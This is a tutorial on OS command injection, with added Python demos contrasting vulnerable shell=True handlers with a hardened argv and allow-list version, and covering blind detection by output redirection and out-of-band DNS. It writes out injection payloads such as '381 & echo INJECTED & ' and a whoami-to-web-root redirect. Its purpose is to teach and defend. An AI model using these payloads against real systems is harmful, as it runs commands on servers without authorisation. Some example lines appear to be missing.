OS Command Injection
PRACTICE ! PRACTICE ! PRACTICE !
OS command injection
is a security vulnerability that allows an attacker to execute operating-system commands on the server that runs an application. The injected commands run with the privileges of the application's own OS user, so they can reach whatever that user can reach.
Executing arbitrary commands
To provide the stock information, the application calls out to a shell command with the product and store IDs as arguments:
stockreport.pl 381 29
This command outputs the stock status for the specified item, and that output is returned to the user in the application's response.
An attacker can inject their own command into this call, because the parameter values are placed straight into the command line without validation.
If the modified input is submitted in the request, the command the server runs looks something like:
The echo command simply echoes the supplied string, and the & character is a shell command separator: it ends the stockreport.pl command, so the shell runs the echo as a separate command. Because the application returns the command output to the user, seeing the echoed string in the response confirms that the injected command was executed.
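The following is an added example, not code from the original page: a stand-in for the stock-status handler described above, written in Python. It shows the vulnerable pattern (one command string handed to /bin/sh) next to a hardened form (an allow-list on the IDs plus an argv list with no shell). The script name stockreport.pl is taken from the page; the script itself is not part of the example, so the only output that can appear is whatever the shell runs besides it. The attacker input INJECTED_PRODUCT_ID is constructed here.

```python
import re
import subprocess

# Added example, not code from the original page. "stockreport.pl" is the
# script name used in the page's description; it does not exist on this
# machine, so any stdout we observe comes from a command the shell ran
# in addition to it.
STOCK_REPORT = "stockreport.pl"


def stock_status_vulnerable(product_id, store_id):
    """The pattern the page describes: a single string is built from the
    request parameters and handed to /bin/sh, so the shell, not the
    application, decides where the stockreport.pl command ends."""
    cmd = "%s %s %s" % (STOCK_REPORT, product_id, store_id)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


# Constructed attacker input (assumption: the application copies the
# productID query parameter into the command line as-is). The first &
# ends stockreport.pl's argument list, the echo runs as its own command,
# and the second & separates it from the trailing store ID.
INJECTED_PRODUCT_ID = "381 & echo INJECTED & "


ID_RE = re.compile(r"[0-9]{1,10}")


def validate_id(value):
    """Allow-list: an ID is 1 to 10 ASCII digits and nothing else."""
    if not ID_RE.fullmatch(value):
        raise ValueError("rejected parameter value: %r" % (value,))
    return value


def stock_status_argv(product_id, store_id):
    """Hardened form: validated values become separate argv entries.
    With shell=False no shell parses them, so '&', '|', ';' or a newline
    in a value would reach stockreport.pl as ordinary characters even if
    the validation above were missing."""
    return [STOCK_REPORT, validate_id(product_id), validate_id(store_id)]


def stock_status_hardened(product_id, store_id):
    proc = subprocess.run(stock_status_argv(product_id, store_id),
                          shell=False, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # The vulnerable handler returns "INJECTED\n": the echo ran.
    print(repr(stock_status_vulnerable(INJECTED_PRODUCT_ID, "29")))
    try:
        stock_status_hardened(INJECTED_PRODUCT_ID, "29")
    except ValueError as exc:
        print("hardened handler:", exc)
```

The argv form alone already stops the shell from interpreting metacharacters; the digit allow-list is kept as well so that a value which is not an ID never reaches the script, which matters if stockreport.pl itself passes its arguments on to another shell.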
Blind OS command injection
Many real-world instances are blind OS command injections: the application does not return the output of the injected command in its HTTP response.
Consider a web site that lets users submit feedback about the site. The user enters their email address and a feedback message.
The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the mail program with the submitted details.
The output of the mail command is not returned in the application response, so an echo payload like the one above proves nothing here. To detect this blind form of the vulnerability, we need a side channel through which the effect of the injected command becomes observable; two such techniques follow.
Blind OS Command Injection by redirecting output
We can redirect the injected command's output into a file inside the web root and then retrieve that file through the browser.
Submit Feedback Form : email=t||whoami > /var/www/images/whoami.txt||
We can now retrieve the output by requesting whoami.txt from the web server. Note that || only runs whoami when the command before it fails (which the broken mail command line does), and the trailing || keeps whatever the application appends after the email address from breaking the command. This technique also needs a directory under the web root that the application's OS user can write to.
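The following is an added example, not code from the original page: a Python stand-in for the feedback handler that pastes the submitted email address into a mail command line, the page's redirection payload with the web root made configurable, and the retrieval step. Its assumptions are labelled in the code: a temporary directory stands in for /var/www/images, and a stub mail command that always exits 1 is placed first on PATH so the example runs without a mail system and the || behaviour is deterministic.

```python
import os
import stat
import subprocess
import tempfile

# Added example, not code from the original page. Assumptions: a temporary
# directory plays the role of the writable web root (/var/www/images on the
# page), and a stub "mail" that always fails is put on PATH, since no real
# mail system is needed to show the technique.


def make_environment():
    """Create the stand-in web root and the PATH that finds the stub mail."""
    webroot = tempfile.mkdtemp(prefix="webroot-")
    fakebin = tempfile.mkdtemp(prefix="bin-")
    stub = os.path.join(fakebin, "mail")
    with open(stub, "w") as fh:
        fh.write("#!/bin/sh\nexit 1\n")   # constructed stub: mail always fails
    os.chmod(stub, stat.S_IRWXU)
    env = dict(os.environ)
    env["PATH"] = fakebin + os.pathsep + os.environ.get("PATH", os.defpath)
    return webroot, env


def submit_feedback_vulnerable(email, message, env):
    """Stand-in for the page's feedback handler. The submitted address is
    pasted into the command line that /bin/sh parses. Nothing the command
    prints reaches the user: the response is the same fixed text whether
    or not the injected command ran, which is what makes it blind."""
    cmd = "echo '%s' | mail -s 'Site feedback' -aFrom:%s admin@example.com" % (
        message, email)
    subprocess.run(cmd, shell=True, env=env, capture_output=True, text=True)
    return "Thank you for your feedback."


def redirect_payload(webroot):
    """The page's payload with the web root parameterised. Everything up to
    the first || becomes the tail of the mail command; when that command
    fails, whoami runs and its output is redirected into the web root. The
    trailing || turns whatever the application appends after the address
    into an alternative that never runs, so it cannot break the command."""
    return "t||whoami > %s/whoami.txt||" % webroot


def dropped_file_exists(webroot):
    return os.path.exists(os.path.join(webroot, "whoami.txt"))


def retrieve_dropped_output(webroot):
    """What a browser request for whoami.txt would return."""
    with open(os.path.join(webroot, "whoami.txt")) as fh:
        return fh.read().strip()


def expected_whoami():
    """Reference value: whoami run directly, for comparison with the file."""
    return subprocess.run(["whoami"], capture_output=True, text=True).stdout.strip()


if __name__ == "__main__":
    webroot, env = make_environment()
    print(submit_feedback_vulnerable(redirect_payload(webroot), "great site", env))
    print("dropped file says:", retrieve_dropped_output(webroot))
```

The response never changes, so the only evidence is the file itself. Because the payload uses ||, whoami runs only if the mangled mail command fails; on a target where the preceding command happens to succeed, a separator such as & or ; runs the injected command unconditionally instead.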
Blind OS Command Injection using out-of-band technique
An injected command that triggers an out-of-band network interaction with a system that you control also reveals blind injection.
The payload uses the nslookup
command to cause a DNS lookup for a domain you control; seeing that lookup arrive at your DNS server confirms that the command executed, even though the application response shows nothing.